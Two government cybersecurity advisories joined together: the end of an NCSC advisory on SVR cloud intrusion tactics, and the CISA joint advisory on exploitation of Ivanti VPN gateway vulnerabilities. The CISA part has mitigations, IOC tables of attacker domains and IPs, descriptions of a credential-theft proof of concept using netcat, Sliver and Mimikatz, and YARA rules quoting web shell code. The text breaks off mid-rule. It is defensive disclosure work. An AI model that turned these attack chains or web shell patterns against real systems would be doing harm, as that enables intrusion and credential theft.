initial access to a network, to launch further operations. SVR campaigns have also targeted dormant accounts belonging to users who no longer work at a victim organization but whose accounts remain on the system [T1078.004]. Following an enforced password reset for all users during an incident, SVR actors have also been observed logging into inactive accounts and following instructions to reset the password. This has allowed the actor to regain access following incident response eviction activities. CLOUD-BASED TOKEN AUTHENTICATION Account access is typically authenticated by either username and password credentials or system-issued access tokens. The NCSC and partners have observed SVR actors using tokens to access their victims’ accounts, without needing a password [T1528]. The default validity time of system-issued tokens varies dependent on the system; however, cloud platforms should allow administrators to adjust the validity time as appropriate for their users. More information can be found on this in the mitigations section of this advisory. ENROLLING NEW DEVICES TO THE CLOUD On multiple occasions, the SVR have successfully bypassed password authentication on personal accounts using password spraying and credential reuse. SVR actors have also then bypassed MFA through a technique known as “MFA bombing” or “MFA fatigue,” in which the actors repeatedly push MFA requests to a victim’s device until the victim accepts the notification [T1621]. Once an actor has bypassed these systems to gain access to the cloud environment, SVR actors have been observed registering their own device as a new device on the cloud tenant [T1098.005]. If device validation rules are not set up, SVR actors can successfully register their own device and gain access to the network. By configuring the network with device enrollment policies, there have been instances where these measures have defended against SVR actors and denied them access to the cloud tenant. RESIDENTIAL PROXIES As network-level defenses improve detection of suspicious activity, SVR actors have looked at other ways to stay covert on the internet. A TTP associated with this actor is the use of residential proxies [T1090.002]. Residential proxies typically make traffic appear to originate from IP addresses within internet service provider (ISP) ranges used for residential broadband customers and hide the true source. This can make it harder to distinguish malicious connections from typical users. This reduces the effectiveness of network defenses that use IP addresses as indicators of compromise, and so it is important to consider a variety of information sources such as application and host-based logging for detecting suspicious activity. CONCLUSION The SVR is a sophisticated actor capable of carrying out a global supply chain compromise such as the 2020 SolarWinds, however the guidance in this advisory shows that a strong baseline of cyber security fundamentals can help defend from such actors. For organizations that have moved to cloud infrastructure, a first line of defense against an actor such as SVR should be to protect against SVR’s TTPs for initial access. By following the mitigations outlined in this advisory, organizations will be in a stronger position to defend against this threat. Once the SVR gain initial access, the actor is capable of deploying highly sophisticated post compromise capabilities such as MagicWeb, as reported in 2022. Therefore, mitigating against the SVR’s initial access vectors is particularly important for network defenders. CISA have also produced guidance through their Secure Cloud Business Applications (SCuBA) Project which is designed to protect assets stored in cloud environments. Some of the TTPs listed in this report, such as residential proxies and exploitation of system accounts, are similar to those reported as recently as January 2024 by Microsoft. MITRE ATT&CK® This report has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. Tactic ID Technique Procedure Credential Access T1110 Brute Force The SVR use password spraying and brute forcing as an initial infection vector. Initial Access T1078.004 Valid Accounts: Cloud Accounts The SVR use compromised credentials to gain access to accounts for cloud services, including system and dormant accounts. Credential Access T1528 Steal Application Access Token The SVR use stolen access tokens to login to accounts without the need for passwords. Credential Access T1621 Multi-Factor Authentication Request Generation The SVR repeatedly push MFA requests to a victim’s device until the victim accepts the notification, providing SVR access to the account. Command and Control T1090.002 Proxy: External Proxy The SVR use open proxies in residential IP ranges to blend in with expected IP address pools in access logs. Persistence T1098.005 Account Manipulation: Device Registration The SVR attempt to register their own device on the cloud tenant after acquiring access to accounts. MITIGATION AND DETECTION A number of mitigations will be useful in defending against the activity described in this advisory:  Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises. See NCSC guidance: Multifactor Authentication for Online Services and Setting up 2-Step Verification (2SV). Accounts that cannot use 2SV should have strong, unique passwords. User and system accounts should be disabled when no longer required with a “joiners, movers, and leavers” process in place and regular reviews to identify and disable inactive/dormant accounts. See NCSC guidance: 10 Steps to Cyber Security. System and service accounts should implement the principle of least privilege, providing tightly scoped access to resources required for the service to function. Canary service accounts should be created which appear to be valid service accounts but are never used by legitimate services. Monitoring and alerting on the use of these account provides a high confidence signal that they are being used illegitimately and should be investigated urgently. Session lifetimes should be kept as short as practical to reduce the window of opportunity for an adversary to use stolen session tokens. This should be paired with a suitable authentication method that strikes a balance between regular user authentication and user experience. Ensure device enrollment policies are configured to only permit authorized devices to enroll. Use zero-touch enrollment where possible, or if self-enrollment is required then use a strong form of 2SV that is resistant to phishing and prompt bombing. Old devices should be prevented from (re)enrolling when no longer required. See NCSC guidance: Device Security Guidance. Consider a variety of information sources such as application events and host-based logs to help prevent, detect and investigate potential malicious behavior. Focus on the information sources and indicators of compromise that have a better rate of false positives. For example, looking for changes to user agent strings that could indicate session hijacking may be more effective than trying to identify connections from suspicious IP addresses. See NCSC guidance: Introduction to Logging for Security Purposes. DISCLAIMER This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation. Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk. All material is UK Crown Copyright.

SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations: Federal Bureau of Investigation (FBI) Multi-State Information Sharing & Analysis Center (MS-ISAC) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) United Kingdom National Cyber Security Centre (NCSC-UK) Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment New Zealand National Cyber Security Centre (NCSC-NZ) CERT-New Zealand (CERT NZ) Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise. Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges. During multiple incident response engagements associated with this activity, CISA identified that Ivanti’s internal and previous external ICT failed to detect compromise. In addition, CISA has conducted independent research in a lab environment validating that the Ivanti ICT is not sufficient to detect compromise and that a cyber threat actor may be able to gain root-level persistence despite issuing factory resets. The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available. If a potential compromise is detected, organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory. Based upon the authoring organizations’ observations during incident response activities and available industry reporting, as supplemented by CISA’s research findings, the authoring organizations recommend that the safest course of action for network defenders is to assume a sophisticated threat actor may deploy rootkit level persistence on a device that has been reset and lay dormant for an arbitrary amount of time. For example, as outlined in PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure), sophisticated actors may remain silent on compromised networks for long periods. The authoring organizations strongly urge all organizations to consider the significant risk of adversary access to, and persistence on, Ivanti Connect Secure and Ivanti Policy Secure gateways when determining whether to continue operating these devices in an enterprise environment. Note: On February 9, 2024, CISA issued Emergency Directive (ED) 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities, which requires emergency action from Federal Civilian Executive Branch (FCEB) agencies to perform specific actions on affected products. The Canadian Centre for Cyber Security also issued an alert, Ivanti Connect Secure and Ivanti Policy Secure gateways zero-day vulnerabilities, which provides periodic updates for IT professionals and managers affected by the Ivanti vulnerabilities. Download the PDF version of this report: AA24-060B Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (PDF, 2.20 MB ) For a downloadable copy of IOCs, see: AA24-060B STIX XML (XML, 70.12 KB ) AA24-060B STIX JSON (JSON, 53.65 KB ) TECHNICAL DETAILS This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques in Appendix C for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview On January 10, 2024, Volexity reported on two vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways observed being chained to achieve unauthenticated remote code execution (RCE):[1] CVE 2023-46805 CVE-2024-21887 Volexity first identified active exploitation in early December 2023, when they detected suspicious lateral movement [TA0008] on the network of one of their network security monitoring service customers. Volexity identified that threat actors exploited the vulnerabilities to implant web shells, including GLASSTOKEN and GIFTEDVISITOR, on internal and external-facing web servers [T1505.003]. Once successfully deployed, these web shells are used to execute commands on compromised devices.[1] After Ivanti provided initial mitigation guidance in early January, threat actors developed a way to bypass those mitigations to deploy BUSHWALK, LIGHTWIRE, and CHAINLINE web shell variants.[2] Following the actors’ developments, Ivanti disclosed three additional vulnerabilities: CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA that allows an attacker to access restricted resources without authentication. CVE-2024-22024 is an XML vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x), and ZTA gateways that allows an attacker to access restricted resources without authentication. CVE-2024-21888 is a privilege escalation vulnerability found in the web component of Ivanti Connect Secure and Ivanti Policy Secure. This vulnerability allows threat actors to gain elevated privileges to that of an administrator. Observed Threat Actor Activity CISA has responded to multiple incidents related to the above vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. In these incidents, actors exploited these CVEs for initial access to implant web shells and to harvest credentials stored on the devices. Post-compromise, the actors moved laterally into domain environments and have been observed leveraging tools that are native to the Ivanti appliances—such as freerdp, ssh, telnet, and nmap libraries—to expand their access to the domain environment. The result, in some cases, was a full domain compromise. During incident response investigations, CISA identified that Ivanti’s internal and external ICT failed to detect compromise. The organizations leveraged the integrity checker to identify file mismatches in Ivanti devices; however, CISA incident response analysis confirmed that both the internal and external versions of the ICT were not reliable due to the existence of web shells found on systems that had no file mismatches according to the ICTs. Additionally, forensic analysis showed evidence the actors were able to clean up their efforts by overwriting files, time-stomping files, and re-mounting the runtime partition to return the appliance to a “clean state.” This reinforces that ICT scans are not reliable to indicate previous compromise and can result in a false sense of security that the device is free of compromise. As detailed in Appendix A, CISA conducted independent research in a lab environment validating that the ICT is likely insufficient for detecting compromise and that a cyber threat actor may be able to maintain root level persistence despite issuing factory resets and appliance upgrades. INDICATORS OF COMPROMISE See Tables 1 – 4 in Appendix B for IOCs related to cyber actors exploiting multiple CVEs related to Ivanti appliances. For additional indicators of compromise, see: Volexity: Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN Mandiant: Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation Mandiant: Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation Mandiant: Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts Memory and disk forensics were used during forensic analysis, combined with the Integrity Checker Tool, to identify malicious files on the compromised Ivanti Connect Secure VPN appliance. This advisory provides a list of combined authoring organization IOCs and open source files identified by Volexity via network analysis. Disclaimer: Some IP addresses in this advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action such as blocking. Activity should not be attributed as malicious without analytical evidence to support it is used at the direction of, or controlled by, threat actors. DETECTION METHODS YARA Rules See Appendix D for additional open source YARA rules, provided by Volexity, that may aid network defenders in detecting malicious activity within Ivanti Connect Secure VPN appliances. For more information on detection methods, visit Mandiant’s blog post Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation or the Volexity GitHub page. INCIDENT RESPONSE The authoring organizations encourage you to assess your organization’s user interface (UI) software and systems for evidence of compromise and to hunt for malicious activity using signatures outlined within this advisory. If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the Ivanti Connect Secure VPN appliance as well as executing arbitrary code and installing malicious payloads. Note: These are vendor-managed appliances and systems may be encrypted with limited access. Thus, collecting artifacts may be limited on some versions of appliances. The authoring organizations recommend investigating associated devices on the network to identify lateral movement in the absence of access to the Secure Connect appliance. If a potential compromise is detected, organizations should: Quarantine or take offline potentially affected hosts. Reimage compromised hosts. Reset all credentials that may have been exposed during the compromise, including user and service accounts. Identify Ivanti hosts with Active Directory (AD) access, threat actors can trivially export active domain administrator credentials during initial compromise. Until there is evidence to the contrary, it is assumed that AD access on compromised systems is connected to external authentication systems such as Lightweight Directory Access Protocol (LDAP) and AD. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). Organizations outside of the United States should contact their national cyber center. (See the Reporting section.) MITIGATIONS These mitigations apply to all critical infrastructure organizations and network defenders using Ivanti Connect Secure VPN and Ivanti Policy Secure. The authoring organizations recommend that software manufacturers incorporate Secure by Design principles and tactics into their software development practices. These principles and tactics can limit the impact of exploitation—such as threat actors leveraging newly discovered, unpatched vulnerabilities within Ivanti appliances—thus, strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design webpage and joint guide. The authoring organizations recommend organizations implement the mitigations below to improve your cybersecurity posture based on threat actor activity and to reduce the risk of compromise associated with Ivanti vulnerabilities. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. As organizations make risk decisions in choosing a VPN, to include decisions regarding continued operation of Ivanti Connect Secure and Policy Secure gateways, avoid VPN solutions that use proprietary protocols or non-standard features. VPNs as a class of devices carry some specific risks that a non-expert implementer may trigger (e.g., authentication integration and patching). When choosing a VPN, organizations should consider vendors who: Provide a Software Bill of Materials (SBOM) to proactively identify, and enable remediation of, embedded software vulnerabilities, such as deprecated operating systems. Allow a restore from trusted media to establish a root of trust. If the software validation tooling can be modified by the software itself, there is no way to establish a root of trust other than returning the device to the manufacturer (return material authorization [RMA]). Are a CVE Numbering Authority (CNA) so that CVEs are assigned to emerging vulnerabilities in a timely manner. Have a public Vulnerability Disclosure Policy (VDP) to enable security researchers to proactively share and disclose vulnerabilities through coordinated vulnerability disclosure (CVD). Have in place a clear end-of-life policy (EoL) to prepare customers for updating to supported product versions. Limit outbound internet connections from SSL VPN appliances to restrict access to required services. This will limit the ability of an actor to download tools or malware onto the device or establish outbound connections to command and control (C2) servers. Ensure SSL VPN appliances configured with Active Directory or LDAP authentication use low privilege accounts for the LDAP bind. Limit SSL VPN connections to unprivileged accounts only to help limit the exposure of privileged account credentials. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Secure remote access tools. Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Strictly limit the use of Remote Desktop Protocols (RDP) and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies. Use longer passwords consisting of at least 15 characters [CPG 2.B]. Store passwords in hashed format using industry-recognized password managers. Add password user “salts” to shared login credentials. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints.” Require administrator credentials to install software. Review the CISA and NSA joint guidance for Selecting and Hardening Remote Access VPN Solutions. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how the controls perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (Appendix C). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. REPORTING U.S. organizations should report every potential cyber incident to the U.S. government. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI’s Internet Crime Complaint Center (IC3), local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472). The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI Field Office. Australian organizations that have been impacted or require assistance regarding Ivanti compromise, contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au. UK organizations that have been impacted by Ivanti compromise, should report the incident to the National Cyber Security Centre. Organizations outside of the United States or Australia should contact their national cyber center. REFERENCES Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN | Volexity Ivanti Connect Secure VPN Exploitation Goes Global | Volexity KB CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways Cutting Edge, Part 2: Investigating Ivanti Connect Secure VPN Zero-Day Exploitation | Mandiant DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and authoring organizations. ACKNOWLEDGEMENTS Volexity, Mandiant, and Ivanti contributed to this advisory. VERSION HISTORY February 29, 2024: Initial version. APPENDIX A: CISA’S PRODUCT EVALUATION FINDINGS Research Approach As part of ongoing efforts to effectively serve the cybersecurity community with actionable insights and guidance, CISA conducted research by using a free and downloadable version of the Ivanti Connect Secure virtual appliance to assess potential attack paths and adversary persistence mechanisms. The virtual appliances were not connected to the internet, and were deployed in a closed virtualized network, with a non-internet connected Active Directory. This research included a variety of tests on version 22.3R1 Build 1647, connected to Active Directory credentials, to leverage the access obtained through CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893. Put simply, CISA’s research team wanted to answer the question: “How far could an attacker go if they set were to exploit these CVEs remotely?” Persistent Post-Reset and -Upgrade Access Leveraging these vulnerabilities, CISA researchers were able to exfiltrate domain administrator cleartext credentials [TA0006], gain root-level persistence [TA0003], and bypass integrity checks used by the Integrity Checker application. CISA’s Incident Response team observed these specific techniques leveraged during the agency’s incident response engagements, along with the native tools and libraries to conduct internal reconnaissance and compromise domains behind the Ivanti appliances. CISA researchers assess that threat actors are able to use the credentials to move deeper into the environment. The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials as shown in Figure 4, APPENDIX A. Users who currently have active sessions to the appliance could have their base64 encoded active directory cleartext passwords, in addition to the New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in Figure 10, APPENDIX A. In addition to users with active sessions, users previously authenticated can have base64 encoded active directory plaintext passwords and NTLM hashes harvested from the backups of the data.mdb database files stored on the appliance, as shown in Figure 15 and 16, APPENDIX A. The root-level access allows adversaries to maintain persistence despite issuing factory resets and appliance upgrades while deceiving the provided integrity checkers, creating the illusion of a clean installation. Due to the persistence mechanism being stored on the encrypted partition of the drive and inaccurate integrity check results, it is untenable for network administrators to validate their application has not been compromised without also decrypting the partition and validating against a clean installation of the appliance, which are actions not easily accomplished at present. Without major alterations of the integrity checking process, it is conceivable that new vulnerabilities that afford root-level access to the appliance could also result in root-kit level persistence to the appliance. Below is proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration: Figure 1: Ivanti Domain Join Configuration with “Save Credentials”​​​​​ Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection Figure 3: Upgrade Netcat Connection to Sliver Implant Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials Below is a demonstration of the capacity for post exploitation exfiltration of base64 encoded cleartext credentials for active directory users and their associated NTLM password hashes: Figure 5: Configuration of User Realm Figure 6: User Realm Configuration to Domain Figure 7: Configuration of User Realm Mapping Figure 8: Login as “vpnuser1” to Establish an Active Session Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Perl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User Figure 10: Decode base64 Encoded Blob to Display User’s Plaintext Credentials Figure 11: Using Mimikatz Validate NTLM Password Hash Obtained in Figure 10 Matches Active Directory User Credential Hash Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mb Database Files Containing Credentials for Active and Inactive Sessions Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials from LMDB-Backup Database Files Figure 17: Decode Credentials from LMDB-Backup Database Files Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files APPENDIX B: INDICATORS OF COMPROMISE Table 1: Ivanti Connect Secure VPN Indicators of Compromise Filename Description Purpose /home/perl/DSLogConfig.pm Modified Perl module. Designed to execute sessionserver.pl. /usr/bin/a.sh gcore.in core dump script.   /bin/netmon Sliver binary.   /home/venv3/lib/python3.6/site-packages/*.egg Python package containing WIREFIRE among other files.   /home/etc/sql/dsserver/sessionserver.pl Perl script to remount the filesystem with read/write access. Make sessionserver.sh executable, execute it, then restore original mount settings. /home/etc/sql/dsserver/sessionserver.sh Script executed by sessionserver.pl. Uses regular expressions to modify compcheckresult.cgi to insert a web shell into it; also creates a series of entries into files associated with the In-build Integrity Checker Tool to evade detection when periodic scans are run. /home/webserver/htdocs/dana-na/auth/compcheckresult.cgi Modified legitimate component of the ICS VPN appliance, with new Perl module imports added and a one-liner to execute commands based on request parameters. Allows remote code execution over the Internet if the attacker can craft a request with the correct parameters. /home/webserver/htdocs/dana-na/auth/lastauthserverused.js Modified legitimate JavaScript component loaded by user login page of the Web SSL VPN component of Ivanti Connect Secure. Modified to harvest entered credentials and send them to a remote URL on an attacker-controlled domain. Table 2: Ivanti Connect Secure VPN Indicators of Compromise Value Type Description 88.119.169[.]227 IP Address   103.13.28[.]40 IP Address   46.8.68[.]100 IPv4   206.189.208[.]156 IP Address DigitalOcean IP address tied to UTA0178. gpoaccess[.]com Hostname Suspected UTA0178 domain discovered via domain registration patterns. webb-institute[.]com Hostname Suspected UTA0178 domain discovered via domain registration patterns. symantke[.]com Hostname UTA0178 domain used to collect credentials from compromised devices. 75.145.243[.]85 IP Address UTA0178 IP address observed interacting with compromised device. 47.207.9[.]89 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 98.160.48[.]170 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 173.220.106[.]166 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 73.128.178[.]221 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 50.243.177[.]161 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 50.213.208[.]89 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 64.24.179[.]210 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 75.145.224[.]109 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.   50.215.39[.]49 IP Address UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. 71.127.149[.]194   UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network.   173.53.43[.]7   UTA0178 IP address observed interacting with compromised device tied to Cyberoam proxy network. Table 3: Host-Based Indicators (HBIs) Indicators of Compromise Filename Hash Value Description Cav-0.1-py3.6.egg ed4b855941d6d7e07aacf016a2402c4c870876a050a4a547af194f5a9b47945f WIREFIRE web shell Health.py 3045f5b3d355a9ab26ab6f44cc831a83 CHAINLINE web shell compcheckresult.cgi 3d97f55a03ceb4f71671aa2ecf5b24e9 CHAINLINE web shell lastauthserverused.js 2ec505088b942c234f39a37188e80d7a LIGHTWIRE web shell lastauthserverused.js 8eb042da6ba683ef1bae460af103cc44 WARPWIRE credential harvester variant lastauthserverused.js a739bd4c2b9f3679f43579711448786f WARPWIRE credential harvester variant lastauthserverused.js a81813f70151a022ea1065b7f4d6b5ab WARPWIRE credential harvester variant lastauthserverused.js d0c7a334a4d9dcd3c6335ae13bee59ea WARPWIRE credential harvester variant lastauthserverused.js e8489983d73ed30a4240a14b1f161254 WARPWIRE credential harvester variant logo.gif N/A — varies Configuration and cache dump or CAV web server log exfiltration login.gif N/A — varies Configuration and cache dump [a-fA-f0-9]{10\.css N/A — varies Configuration and cache dump visits.py N/A — varies WIREFIRE web shell Table 4: Host-Based Indicators (HBIs) Indicators of Compromise Network Indicator Type Description symantke[.]com Domain WARPWIRE C2 server miltonhouse[.]nl Domain WARPWIRE variant C2 server entraide-internationale[.]fr Domain WARPWIRE variant C2 server api.d-n-s[.]name Domain WARPWIRE variant C2 server cpanel.netbar[.]org Domain WARPWIRE variant C2 server clickcom[.]click Domain WARPWIRE variant C2 server clicko[.]click Domain WARPWIRE variant C2 server duorhytm[.]fun Domain WARPWIRE variant C2 server line-api[.]com Domain WARPWIRE variant C2 server areekaweb[.]com Domain WARPWIRE variant C2 server ehangmun[.]com Domain WARPWIRE variant C2 server secure-cama[.]com Domain WARPWIRE variant C2 server 146.0.228[.]66 IPv4 WARPWIRE variant C2 server 159.65.130[.]146 IPv4 WARPWIRE variant C2 server 8.137.112[.]245 IPv4 WARPWIRE variant C2 server 91.92.254[.]14 IPv4 WARPWIRE variant C2 server 186.179.39[.]235  IPv4 Mass exploitation activity 50.215.39[.]49 IPv4 Post-exploitation activity 45.61.136[.]14 IPv4 Post-exploitation activity 173.220.106[.]166 IPv4 Post-exploitation activity APPENDIX C: MITRE ATT&CK TACTICS AND TECHNIQUES Initial Access     Technique Title ID Use Exploit Public-Facing Applications T1190 Cyber actors will use custom web shells planted on public facing applications which allows persistence in victims’ environment. Persistence     Technique Title ID Use Valid Accounts T1078 Cyber actors leverage compromised accounts to laterally move within internal systems via RDP, SBD, and SSH. Server Software Component: Web Shell T1505.003 Cyber actors may use web shells on internal- and external-facing web servers to establish persistent access to systems. Execution     Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Cyber actors leverage code execution from request parameters that are decoded from hex to base64 decoded, then passed to Assembly.Load(). Which is used to execute arbitrary powershell commands. Exploitation for Client Execution T1203 Cyber actors will exploit software vulnerabilities such as command-injection and achieve unauthenticated remote code execution (RCE). APPENDIX D: DETECTION METHODS rule apt_webshell_pl_complyshell: UTA0178{    meta:        author = “threatintel@volexity.com”        date = “2023-12-13”        description = “Detection for the COMPLYSHELL webshell.”        hash1 = “8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2”        os = “linux”        os_arch = “all”        report = “TIB-20231215”        scan_context = “file,memory”        last_modified = “2024-01-09T10:05Z”        license = “See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt”        rule_id = 9995        version = 4     strings:        $s = “eval{my $c=Crypt::RC4->new(”     condition:        $s} rule apt_webshell_aspx_glasstoken: UTA0178{    meta:        author = “threatintel@volexity.com”        date = “2023-12-12”        description = “Detection for a custom webshell seen on external facing server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code.”        hash1 = “26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d”        os = “win”        os_arch = “all”        report = “TIB-20231215”        scan_context = “file,memory”        last_modified = “2024-01-09T10:08Z”        license = “See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt”        rule_id = 9994        version = 5     strings:        $s1 = “=Convert.FromBase64String(System.Text.Encoding.Default.GetString(” ascii        $re = /Assembly\.Load\(errors\)\.CreateInstance\(“[a-z0-9A-Z]{4,12}”\).GetHashCode\(\);/     condition:        for any i in (0..#s1):            (                $re in (@s1[i]..@s1[i]+512)            )} rule webshell_aspx_regeorg{    meta:        author = 